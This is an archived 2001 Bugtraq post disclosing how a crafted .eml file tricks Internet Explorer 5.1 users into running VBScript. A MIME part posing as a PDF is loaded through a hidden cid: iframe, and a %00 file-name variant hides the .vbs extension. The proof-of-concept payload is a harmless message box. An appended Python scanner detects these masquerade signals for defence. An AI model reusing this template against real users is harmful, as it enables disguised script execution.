[19998] in bugtraq
User may be fooled to execute programs browsing with IE5.1
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Jes=FAs_L=F3pez_de_)
Mon Apr 2 17:35:20 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-ID: <011401c0bbb1$28e90820$2d9551d4@servidor>
Date: Mon, 2 Apr 2001 22:11:53 +0200
Reply-To: Jesús López de Aguileta <aguileta@EUNATE.NET>
From: Jesús López de Aguileta <aguileta@EUNATE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
Playing with Cuartango's recent exploit
(http://www.kriptopolis.com/cua/eml.html) I've found that it's possible to trick
a user into executing a file by making him/her think it's a data file of some kind
(pdf, mpeg, ...).
This works on both NT and 2000 using IE 5.1 (other platforms/IE versions not
tested).
I have already downloaded the MS01-20 patch on the systems tested, but both
appear not to be vulnerable to Cuartango's exploit (msgbox: "This update does
not need to be installed on your system"), probably because both have an updated
Media Player 7 installed.
I think this is a completely different issue; excuse me if it has already been
solved/commented on.
Detail:
--------8<----cut here-------8<
From: "Ripped from Juan Carlos Garcia Cuartango"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
 type="multipart/alternative";
 boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal

--1
Content-Type: multipart/alternative;
 boundary="2"

--2
Content-Type: text/html;
 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff >
<iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
Done<br>
</BODY>
</HTML>
--2--
--1
Content-Type: application/x-shockwave-flash;
 name="hola.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")
--1--
--------8<--cut here---------8<
Making an .eml file with the above content and browsing it with IE 5 displays a
window to download or browse online the "FILE" (not program) "donthurtme.pdf".
If the user chooses to browse it online, the VBScript code executes.
Another interesting issue is that, when replacing MIME part 1 with:
--1
Content-Type: application/xxxx;
 name="hola.pdf%00.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")
--1--
IE truncates the name in the popup window, displaying "hola.pdf" instead of
"hola.pdf%00.vbs", making the user think that the extension of the program is
different. Notice that in this second case IE properly asks "Run this
PROGRAM" or "Save this PROGRAM"; only the extension may confuse the user.
Regards and excuse my poor English.
Jesus Lopez de Aguileta
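As an added example (not code from the original post or from Cuartango's page), the following Python script parses an .eml and flags the three signals the message above relies on: a name= parameter whose real extension is a program while the declared Content-Type and the Content-ID pose as a document, a %00 in the file name that a viewer would truncate, and an HTML part that pulls such a part in through a cid: reference. The sample message embedded in the script is constructed from the structure shown above, and the extension and MIME-type lists are illustrative assumptions.

```python
"""Scan an .eml for attachment masquerading: a leaf part whose declared
Content-Type, name= parameter and Content-ID disagree about what it is, a
%00 in the name that a viewer would truncate, and HTML referencing such a
part via cid:.  Added example, not code from the original post.  SAMPLE_EML
is constructed from the structure the post shows; the extension and type
sets are illustrative assumptions, not authoritative lists."""
import email
import re

# Extensions Windows runs as programs (illustrative assumption).
PROGRAM_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "hta",
                "exe", "com", "scr", "pif", "bat", "cmd"}
# Types a browser treats as passive documents/media (illustrative assumption).
PASSIVE_TYPES = {"application/pdf", "video/mpeg", "application/x-shockwave-flash",
                 "image/jpeg", "image/gif", "audio/mpeg"}

# Constructed sample: same layout as the post, with the %00 variant of part 1.
SAMPLE_EML = b"""\
From: sender@example.invalid
Subject: mail
MIME-Version: 1.0
Content-Type: multipart/related;
 type="multipart/alternative";
 boundary="1"

--1
Content-Type: multipart/alternative;
 boundary="2"

--2
Content-Type: text/html;
 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY>
<iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
Done<br>
</BODY></HTML>
--2--
--1
Content-Type: application/x-shockwave-flash;
 name="hola.pdf%00.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")
--1--
"""


def extensions(name):
    """All dotted extensions of a name, lower-cased, read from the raw string so
    'hola.pdf%00.vbs' -> ['pdf%00', 'vbs'] rather than stopping at the NUL."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return [e.lower() for e in base.split(".")[1:]]


def displayed_name(name):
    """The name a viewer that stops at the first NUL (raw or %00-encoded) shows."""
    return re.split(r"%00|\x00", name, maxsplit=1)[0]


def scan_eml(raw):
    """Return (leaf_part_index, kind, detail) findings for a raw RFC 2822 message."""
    msg = email.message_from_bytes(raw)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    findings = []
    program_parts = {}  # Content-ID -> index of a part whose real extension is a program
    for i, part in enumerate(leaves):
        name = part.get_filename() or ""          # filename= or, failing that, name=
        ctype = part.get_content_type()
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        exts = extensions(name)
        real_ext = exts[-1] if exts else ""
        if re.search(r"%00|\x00", name):
            findings.append((i, "nul-in-name",
                             f"shown as {displayed_name(name)!r}, actually {name!r}"))
        if real_ext in PROGRAM_EXTS:
            if cid:
                program_parts[cid] = i
            if ctype in PASSIVE_TYPES:
                findings.append((i, "type-mismatch",
                                 f"{ctype} declared for .{real_ext} content"))
            cid_exts = extensions(cid)
            if cid_exts and cid_exts[-1] not in PROGRAM_EXTS:
                findings.append((i, "cid-mismatch",
                                 f"Content-ID <{cid}> poses as .{cid_exts[-1]}, part is .{real_ext}"))
    # Second pass: HTML parts that reference a program part by cid:
    for i, part in enumerate(leaves):
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "latin-1"
        html = part.get_payload(decode=True).decode(charset, "replace")  # undoes QP
        for ref in re.findall(r"cid:([^\s\"'>]+)", html, flags=re.I):
            if ref in program_parts:
                findings.append((i, "cid-to-program",
                                 f"cid:{ref} resolves to program part {program_parts[ref]}"))
    return findings


if __name__ == "__main__":
    for index, kind, detail in scan_eml(SAMPLE_EML):
        print(f"part {index}: {kind}: {detail}")
```

The name= parameter is inspected as a raw string on purpose: the truncation the post describes happens in the viewer, so a scanner that itself stops at the NUL would report the harmless-looking "hola.pdf" and miss the .vbs. Run against a mailbox, the same four kinds of finding cover both the original Cuartango layout (name="hola.vbs") and the %00 variant.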